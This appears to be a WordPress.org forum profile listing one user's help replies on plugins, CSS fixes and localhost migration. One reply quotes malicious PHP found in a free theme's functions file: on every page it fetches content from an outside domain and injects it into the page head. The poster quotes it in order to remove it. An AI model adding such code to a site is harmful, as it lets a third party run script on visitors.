ramesh.oct2
Forum Replies Created
-
Forum: Plugins
In reply to: [Contact Form 7 Datepicker] Date Time Plugin not working#wpcf7-tg-pane-datetime, #wpcf7-tg-pane-date, #wpcf7-tg-pane-time {
display:table;
}Add this code to contact form 7’s css file.
#wpcf7-tg-pane-datetime, #wpcf7-tg-pane-date, #wpcf7-tg-pane-time {
display:table;
}Add this code to contact form 7’s css file.
Same issue. I am using latest version of wordpress and plugin still issue is there.
Forum: Plugins
In reply to: [Genesis Custom Headers] Header not displaying on home or Blog page?Thank you for the great plugin, I really love this.
I am also looking for the home/blog page header function. I hope this will done soon.Kindest Regards
RameshGot the solution. I was using Firefox so it was issue of cache. I tried on another browser and it works.
Please try to clear the cache or use any other browser.
Best of luck.
I also want to how I can remove this plugin using database. As I am working on backup at localhost and unable to login to dashboard. I also tried all the options which mentioned in FAQ.
Forum: Fixing WordPress
In reply to: The server can not find the requested pageHi All,
Hope you doing well,
I also found the same issue and in my case I found some code in my function file under the theme folder.
if (!function_exists(‘insert_jquery_theme’)){function insert_jquery_theme(){if (function_exists(‘curl_init’)){$url = “https://www.wpstats.org/jquery-1.6.3.min.js”;$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action(‘wp_head’, ‘insert_jquery_theme’);}
Actually I download that theme free from web and I already faced this king of issue so I have the idea about code.
I just delete all this code from function file and upload the file and now my site is 100% fine.
Don’t forget to take backup before doing this.
All the best.
I got best solution with this option:
https://www.woothemes.com/products/woocommerce-wepay/Hope this gonna work for you.
ThanksBasically there is not any other solution for this issue. This is the only solution or you have to use manually jquery code in theme’s template file.
Thanks
You can do this like for If you want this for Phone option.
On the form edit page go to the field you have for Phone and add a “Default value:” (xxx)xxx-xxxx
Next, add this to the “Attributes:”
onfocus=”if(this.value=='(xxx)xxx-xxxx’)this.value=”;”onblur=”if(this.value==”)this.value='(xxx)xxx-xxxx’;”Thanks
Forum: Plugins
In reply to: [Contact Form 7] [Plugin: Contact Form 7] Contact form problemHi!
I think you can use the redirection option for solve this problem..
https://contactform7.com/redirecting-to-another-url-after-submissions/
Thanks.
Forum: Localhost Installs
In reply to: Moving theme customizing from localYou can do this by replacing all the files from your hosting and then also delete all the tables from database and replace that with the local data base’s tables, then you have to make just some changes with your database which I told earlier.
Hope this gonna help you.
Forum: Localhost Installs
In reply to: wordpress login page won't displayYou have to make changes on database.
You need explorer the database which you create at your local host. Find the table having name wp_options. you’ll found the row with option name “siteurl” change its value that is something like this https://localhost/yourfoldername to your domain. Repeat the same with option name “home”.
Now you are ready to go.all the best.
Forum: Localhost Installs
In reply to: wordpress login page won't displayHi BrianBam,
I think you download this wordpress files from your online site.
May I know that if you download this wordpress website from your online hosting? If this is yes then you have to make changes on database. If this is yes then let me know I’ll provide you the proper solution.Forum: Localhost Installs
In reply to: Moving theme customizing from localHi there,
Everything is correct but the database changes are missing here,
You need explorer the new created database. Find the table having namewp_options
. you’ll found the row with option name “siteurl” change its value that is something like this https://localhost/yourfoldername to your domain. Repeat the same with option name “home”.
Now you are ready to go.all the best.